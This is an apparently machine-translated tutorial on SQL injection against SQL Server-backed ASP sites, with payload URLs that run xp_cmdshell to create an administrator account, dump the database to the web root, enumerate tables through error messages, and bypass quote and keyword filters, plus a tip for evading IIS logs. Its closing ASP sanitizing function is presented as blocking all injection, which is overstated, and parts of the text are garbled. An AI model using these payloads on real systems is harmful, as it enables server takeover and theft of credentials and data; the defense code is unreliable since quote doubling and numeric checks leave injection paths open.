After reading the introductory and advanced articles, you can practice a little bit to crack common websites. However, if you cannot guess the table name or the program author filters out some special characters, how can you improve the injection success rate? How can we improve the efficiency of guessing? Next, read the advanced article.
1. inject SQL Server databases using system tables
Sqlserver is a powerful database system that is closely related to the operating system, which brings great convenience to developers. On the other hand, it also provides a stepping stone for injecting users, let's take a look at several specific examples:
① Http: // site/url. asp? Id = 1; Exec master .. xp_cmdshell "net user name password/Add "--
Semicolons (;); In sqlserver, separate the first and second statements, which indicate that the subsequent statements are comments. Therefore, this statement is divided into two statements for execution in sqlserver, first select the record with ID = 1, and then execute the Stored Procedure xp_mongoshell. This stored procedure is used to call system commands. Therefore, run the "Net" command to create a Windows account with the username and password, and then:
② Http: // site/url. asp? Id = 1; Exec master .. xp_cmdshell "net localgroup name administrators/Add "--
Add the new account name to the Administrator Group. It does not take two minutes. You have obtained the highest system permission! Of course, this method only applies when using SA to connect to the database. Otherwise, you do not have the permission to call xp_mongoshell.
③ Http: // site/url. asp? Id = 1; and db_name ()> 0
In the preceding example, and user> 0 is used to obtain the connection username. db_name () is another system variable and returns the name of the connected database.
④ Http: // site/url. asp? Id = 1; backup database name to disk = 'C: inetpubwwwroot. db ';--
This is a tough trick. Back up the database name obtained from ③ and the absolute path exposed by some IIS errors to the web directory, use http to download the entire database. All administrators and user passwords are displayed at a glance! When you do not know the absolute path, you can back up the network address (such as 202.96.xx.xx2.16.db), but the success rate is not high.
⑤ Http: // site/url. asp? Id = 1; and (select top 1 name from sysobjects where xtype = 'U' and status> 0)> 0
As mentioned above, sysobjects is a system table of sqlserver. It stores all table names, views, constraints, and other objects. xtype = 'U' and status> 0, indicates the name of the table created by the user. The preceding statement extracts the first table name and compares it with 0 to expose the table name with an error message. 2. How can I obtain the name of the third table? Let's leave it to our smart readers.
⑥ Http: // site/url. asp? Id = 1; and (select top 1 col_name (object_id ('table name'), 1) from sysobjects)> 0
After obtaining the table name from ⑤, use object_id ('table name') to obtain the internal ID corresponding to the table name. col_name (table name ID, 1) represents the 1st field names of the table, replace 1 with 2, 3, 4... you can obtain the field names in the table to be guessed one by one.
The above six points are the painstaking efforts I have studied sqlserver for more than half a year. We can see that the degree of understanding of sqlserver directly affects the success rate and the speed of guessing. After studying sqlserver injection, my development level has also been greatly improved. Haha, maybe security and development are complementary.
Ii. Bypass program restrictions and continue Injection
As mentioned in the entry-level article, many users prefer to use the 'number test to inject vulnerabilities. Therefore, many users use the' number filtering method to "Prevent" injection vulnerabilities, this may block some hacker attacks, but those familiar with SQL injection can still use related functions to bypass program restrictions.
In the "general steps of SQL injection" section, all the statements I use are optimized by me so that they do not contain single quotes; in "injecting SQL Server database with system tables", some statements contain the "Number". Let's take an example to see how to modify these statements:
A simple example is where xtype = 'u'. the ASCII code of the character U is 85, so you can replace it with where xtype = char (85). If the character is Chinese, for example, where name = 'user' can be replaced by where name = nchar (29992) + nchar (25143.
Iii. Experience Summary
1. Some people will filter keywords such as select, update, and delete, but they forget to be case sensitive. So you can try using select.
2. If you cannot guess the field name, you can view the logon form on the website. Generally, for convenience, the field names are the same as those in the form input box.
3. Note: The + number in the address bar is interpreted as a space, % 2B is interpreted as a + number, and % 25 is interpreted as a % number. For details, refer to the introduction of urlencode.
4. When the get method is used for injection, IIS will record all your submission strings and will not record the POST method. Therefore, try not to use get for post URLs.
5. you can only use the ASCII literal decoding method to guess access. sqlserver can also use this method. You only need the difference between the two methods. However, if you can use the sqlserver error information to expose the value, the efficiency and accuracy will be greatly improved.
Defense methods
The SQL injection vulnerability is a "treasure of thousands of miles, which breaks the ant hole". This vulnerability is very common on the Internet. It is usually caused by a programmer's lack of understanding about injection, poor program filtering, or a parameter forgetting to check. Here, I will give you a function that replaces the request function in ASP and can inject say no to all SQL statements. The function is as follows:
Function saferequest (paraname, paratype)
'--- Input parameters ---
'Paraname: parameter name-parameter type
'Paratype: parameter type-number type (1 indicates that the preceding parameter is a number, and 0 indicates that the preceding parameter is a character)
Dim paravalue
Paravalue = request (paraname)
If paratype = 1 then
If not isnumeric (paravalue) then
Response. Write "parameter" & paraname & "must be numeric! "
Response. End
End if
Else
Paravalue = Replace (paravalue ,"'","''")
End if
Saferequest = paravalue
End Function
This article is over. Whether you are a security engineer, a technical enthusiast or a programmer, I hope this article will help you.